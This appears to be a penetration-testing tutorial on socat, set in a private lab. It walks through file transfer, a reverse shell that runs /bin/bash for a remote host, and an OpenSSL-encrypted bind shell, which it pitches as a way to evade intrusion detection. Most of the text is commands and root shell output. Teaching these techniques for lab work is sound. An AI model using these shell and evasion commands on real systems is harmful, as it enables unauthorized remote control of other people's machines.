Socat is a command-line utility that establishes two bidirectional byte streams and transfers data
between them. For penetration testing, it is similar to Netcat but has additional useful features.

While there are a multitude of things that socat can do, we will only cover a few of them to illustrate
its use.

Socat File Transfers

Server side:

1 2	┌──(root㉿kali)-[/home/kali/Desktop] └─# socat TCP4-LISTEN:443,fork file:nmap-list.txt

Client side:

C:\Users\Administrator\Desktop\socat> socat TCP4:192.168.244.140:443 file:nmap-list.txt ,create
C:\Users\Administrator\Desktop\socat> type nmap-list.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-17 23:19 EDT
Warning: 199.241.133.26 giving up on port because retransmission cap hit (10).
Stats: 0:07:04 elapsed; 0 hosts completed (64 up), 64 undergoing SYN Stealth Scan
...

Socat Reverse Shells

Server side:

1 2	C:\Users\Administrator\Desktop\socat> socat -d -d TCP4-LISTEN:443 STDOUT ... socat[5640] N listening on AF=2 0.0.0.0:443

Client side:
When client side type follow command :

1 2	┌──(root㉿kali)-[/home/kali/Desktop] └─# socat TCP4:192.168.244.140:443 EXEC:/bin/bash

Then the server side , look like:

C:\Users\Administrator\Desktop\socat> socat -d -d TCP4-LISTEN:443 STDOUT
... socat[5640] N listening on AF=2 0.0.0.0:443
... socat[5640] N accepting connection from AF=2 192.168.244.140:54720 on 192.168.244.144:443
... socat[5640] N using stdout for reading and writing
... socat[5640] N starting data transfer loop with FDs [4,4] and [1,1]
whoami
root
id
uid=0(root) gid=0(root) groups=0(root)

Socat Encrypted Bind Shells

To add encryption to a bind shell, we will rely on Secure Socket Layer certificates. This level of
encryption will assist in evading intrusion detection systems (IDS) and will help hide the sensitive
data we are transceiving.
To continue with the example, we will use the openssl application to create a selfsigned certificate using the following options:
• req: initiate a new certificate signing request
• -newkey: generate a new private key
• rsa:2048: use RSA encryption with a 2,048-bit key length.
• -nodes: store the private key without passphrase protection
• -keyout: save the key to a file
• -x509: output a self-signed certificate instead of a certificate request
• -days: set validity period in days
• -out: save the certificate to a file

Once we generate the key, we will cat the certificate and its private key into a file, which we will
eventually use to encrypt our bind shell.

Server side:

┌──(root㉿kali)-[/home/kali/Desktop]
└─# openssl req -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 362 -out bind_shell.crt
...+..+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*.+.....+.+...+.....+......+.+......+.....+.......+.....+...............+.+.....+.+......+...+..+....+...+...+..................+.........+...+.....+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*.....+......+......+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
.+.+......+...+..+.+.....+.........+......+...+.........+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*..............+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*....+....+........+....+.....+.+.....+...+.......+..+.......+........+.+.....+.+...+........+.........+..................+......+.........+......+..........+.........+..+....+.........+......+.........+...+..+...+....+........+......+.+.........+......+...........+...+.......+...........................+.....+.......+......+........+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:CA
State or Province Name (full name) [Some-State]:Quebec
Locality Name (eg, city) []:Montreal
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Raohua
Organizational Unit Name (eg, section) []:Try Harder Department
Common Name (e.g. server FQDN or YOUR name) []:
Email Address []:
                                                                                                                                                            
┌──(root㉿kali)-[/home/kali/Desktop]
└─# cat bind_shell.key bind_shell.crt > bind_shell.pem
                                                                                                                                                            
┌──(root㉿kali)-[/home/kali/Desktop]
└─# socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash

Client side:

C:\Users\Administrator\Desktop\socat> socat - OPENSSL:192.168.244.140:443,verify=0
id
uid=0(root) gid=0(root) 0=1000(root)
whoami
root
ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:0c:29:f9:b4:b9 brd ff:ff:ff:ff:ff:ff
    inet 192.168.244.140/24 brd 192.168.244.255 scope global dynamic noprefixroute eth0
       valid_lft 1168sec preferred_lft 1168sec
    inet6 fe80::9d6e:bd4e:a4b2:6ffb/64 scope link noprefixroute 
       valid_lft forever preferred_lft forever
3: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default 
    link/ether 02:42:1d:28:b9:62 brd ff:ff:ff:ff:ff:ff